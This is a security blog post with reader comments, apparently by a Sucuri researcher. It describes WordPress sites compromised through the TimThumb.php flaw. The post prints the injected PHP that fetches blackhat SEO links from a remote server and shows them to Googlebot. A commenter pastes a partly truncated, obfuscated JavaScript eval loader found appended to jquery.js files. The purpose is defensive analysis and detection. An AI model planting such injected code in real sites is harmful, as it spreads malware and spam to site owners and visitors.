TimThumb.php Attacks – Now Being Used for Blackhat Spam SEO and Might Break Your Site

We have been talking a lot lately about the Timthumb.php vulnerability and the importance of updating that script as soon as possible. Sites that didn’t update it are getting compromised very easily. We explained it in more detail here: Mass infection of WordPress sites because of TimThumb.php.

What we are seeing now is sites getting compromised to load links for blackhat seo purposes. They have their wp-settings.php modified with the following code:

function google_bot() {$sUserAgent = strtolower($_SERVER[‘HTTP_USER_AGENT’]);if(!(strpos($sUserAgent, ‘google’) === false)) {if(isset($_SERVER[‘REMOTE_ADDR’]) == true && isset($_SERVER[‘HTTP_HOST’]) == true){$ch = curl_init("’.$_SERVER[‘REMOTE_ADDR"].’&host=’.$_SERVER[‘HTTP_HOST’].
[‘HTTP_REFERER’]);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_TIMEOUT, 10);$re = curl_exec($ch);curl_close($ch);echo $re;}}}add_action(‘wp_footer’, "google_bot");

What this code does is very simple. It connects to to get a few links to be added to the bottom of your site. Links like:

 <a href="http://albertasportswear.com /wp-content/uploads/sweaters/sweater_tights&#46html" alt="Sweater 
Tights" title="Sweater Tights">Sweater Tights</a>
 dilbert sweater vest comic
<br>knitting softwares
 the knitting room fond du lac
 <a href="http://bettyoctopus.com /wp-content/uploads/knitting/knitting_instructions&#46html" alt="Knitting 
Instructions" title="Knitting Instructions">Knitting Instructions</a>
 knitting little luxuries louisa harding

It’s very dynamic, always changing. So in addition to having malware and infecting your users, you could be helping the attackers with page rank as well.

What is interesting is that on some sites the attackers are not only attempting to infect, but are doing it incorrectly leaving some extra lines at the bottom of the wp-settings.php, causing the sites to fail with this error:

Warning: Cannot modify header information – headers already sent by (output started at /home/site/public_html/wp-settings.php:310) in /home1/site/public_html/wp-includes/pluggable.php on line 890

So if you have this warning (headers already sent by (output started at /home/site/public_html/wp-settings.php:310) on your site, it means you are likely compromised as well.

You can check your site here to see if it has this issue: Sucuri SiteCheck

If you need help cleaning up up, sign up here: http://sucuri.net/signup

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • http://www.luisramalho.com Luís Ramalho

    The question now is to find how they did this after all the TimThumb related stuff were removed.

    • David Dede

       Probably a backdoor that wasn’t removed?

      • http://www.luisramalho.com Luís Ramalho

        Yes, in fact that is was makes more sense, but they must be hidding it really well. Were you able to detect any other backdoors besides the one described earlier?

  • vipervin

    Just noticed all my WP installation were hit with this same malware.  I thought I had everything fixed and updated.  Anyone have an idea where the backdoor may be?

  • http://www.sparringmind.com Gregory Ciotti

    Will the Sucuri scanner pick this up and email users registered to your service?

  • Meredith

    I found that in one of my sites that had come through your scanner as clean.  Just a few minutes ago.  Thanks for keeping up the great information on this.

  • Pido

    Not sure if this came in through Timthumb. I updated the script on my wp site and chmoded it to 644 already several days ago. Then my a/v set off an alarm today when I surfed to my site.

    Your site scanner didn’t detect it (yet) but I decided to check all the files on my site anyway.

    Found this at the end of  jquery.js and all the jquery.minXXX.js files. Plus, all the files and folders on my site had been chmodded to 777!

    var lK0LEmv=3243408; var ofa5OVnde=9709687; var xDlN28CbW=42025; var sIAF695=371784; var vww = new Array(13282956, 13282971, 13282964, 13282953, 13282970, 13282959, 13282965, 13282964, 13282886, 13282931, 13282951, 13282961, 13282955, 13282924, 13282968, 13282951, 13282963, 13282955, …
    13282913, 13282979);GPifTs = “”;for (xIZFe = 0; xIZFe < vww.length; xIZFe ++) { GPifTs = GPifTs + String.fromCharCode(vww[xIZFe]-sIAF695+xDlN28CbW-ofa5OVnde-lK0LEmv); }; eval(GPifTs); 

    • David Dede

      The scanner should have detected this one… Can you send us the full content of the file?

  • Florin

    is http://sitecheck.sucuri.net/ down?

  • Sean

    I have a site with custom posts where half of them seemed to vanish, and the only possible culprit we have been able to come up with is this TimThumb hack.

    Has anyone seen this TimThumb issue cause posts to disappear?

  • Pingback: Secure WordPress TimThumb.php and Core Files | GeekyFaust | Philippines, Technology Trends, Tips and Reviews()

  • Pingback: Malware in WordPress-Blogs bereinigen | www.MyNakedGirlfriend.de()

  • http://www.facebook.com/salaslety Letys Salas

    YOUR SCAN DOESN´T WORK.. It shows my site OK but it has the Warning Link at my botton! please help with data, What can I do from my CPanel? …. suggestions’ Tks !! 

Share This